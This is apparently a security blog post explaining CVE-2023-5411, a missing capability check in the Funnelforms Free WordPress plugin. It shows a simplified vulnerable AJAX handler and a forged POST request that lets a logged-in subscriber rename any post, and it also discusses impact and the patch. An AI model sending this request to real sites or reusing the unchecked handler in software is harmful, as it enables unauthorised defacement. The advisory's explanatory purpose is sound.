CVE-2023-5411 - Exploiting the Funnelforms Free Plugin’s Unchecked Permissions (Up to v3.4)

The WordPress ecosystem is fantastic, but sometimes plugins introduce serious security risks. One such case is addressed by CVE-2023-5411, which affects the popular Funnelforms Free plugin—a tool for creating forms in WordPress. In plugin versions up to and including 3.4, there’s a flaw that may let low-privileged users (even regular subscribers!) alter some post data without the site owner’s knowledge.

In this post, I’ll break down how the vulnerability works, show you the involved code, and demonstrate exactly what an attacker could do. I'll also direct you to official references for further reading.

What’s the Issue?

Funnelforms Free allows WordPress admins to create and manage forms. Unfortunately, the plugin doesn’t properly check user permissions in the fnsf_af2_save_post function. Anyone who is logged in—even if all they have is the basic “subscriber” role—can send a specific request to this function and (within limits) change certain post details.

The plugin uses WordPress’s wp_update_post function, but it passes fixed values, so attackers can’t go wild with all post fields. Even so, being able to edit post details as a subscriber is a risk.

Here’s a simplified snippet to illustrate the issue

// Vulnerable Funnelforms Free code (up to v3.4)
add_action('wp_ajax_fnsf_af2_save_post', 'fnsf_af2_save_post');

function fnsf_af2_save_post() {
    // No user capability check!
    $post_id = $_POST['post_id'];
    $post_title = sanitize_text_field($_POST['title']);
    
    // Fixed update—only updates title
    $data = array(
        'ID' => $post_id,
        'post_title' => $post_title,
    );
    wp_update_post($data); // No permission control
    wp_send_json_success('Updated');
}

There’s no check like this

if (!current_user_can('edit_post', $post_id)) {
    wp_send_json_error('Access denied');
    exit;
}

So, *any* authenticated user can send a POST request to this endpoint with an ID and a title, and WordPress will update that post’s title!

Find a Post ID

Either by browsing the site or guessing, the attacker gets a post ID (say, 123).

Using tools like Postman or browser devtools to forge a request

POST /wp-admin/admin-ajax.php?action=fnsf_af2_save_post HTTP/1.1
Host: victim-site.com
Cookie: wordpress_logged_in_xxxxxxx // their session cookie
Content-Type: application/x-www-form-urlencoded

post_id=123&title=HackedByAttacker

Result

WordPress updates the post with ID 123. The title becomes “HackedByAttacker”.

How Bad Is This?

- Limited Damage: Attackers cannot set other post fields (content, status, etc.) with this exploit—only fields the plugin allows, mainly the title.
- Embarrassment & Defacement: Attackers could deface posts or create confusion, but they cannot, for example, publish new posts or inject scripts on their own (unless the site allows titles as HTML).
- Privilege Escalation (Possibly): On some sites, this may allow social engineering or indirect privilege escalation if plugin integrations trust ‘safe’ content from form titles.

Are you using Funnelforms Free v3.4 or lower? Update immediately!

The patched version adds proper calls to current_user_can() and blocks unauthorized access.

Further Reading & References

- Wordfence CVE-2023-5411 Advisory
- CVE Details - CVE-2023-5411
- Funnelforms Free Repository
- WordPress Roles and Capabilities

Conclusion

CVE-2023-5411 highlights the need for strict permission checks in WordPress plugins. Even with fixed values, letting unprivileged users trigger sensitive actions can spell trouble. Always keep plugins updated, and review the code of widely-installed components for these gotchas!

If this affected your site or you want to learn how to audit your WP plugins, let us know in the comments or reach out for more security breakdowns!

Timeline

Published on: 11/22/2023 16:15:12 UTC
Last modified on: 11/27/2023 20:15:34 UTC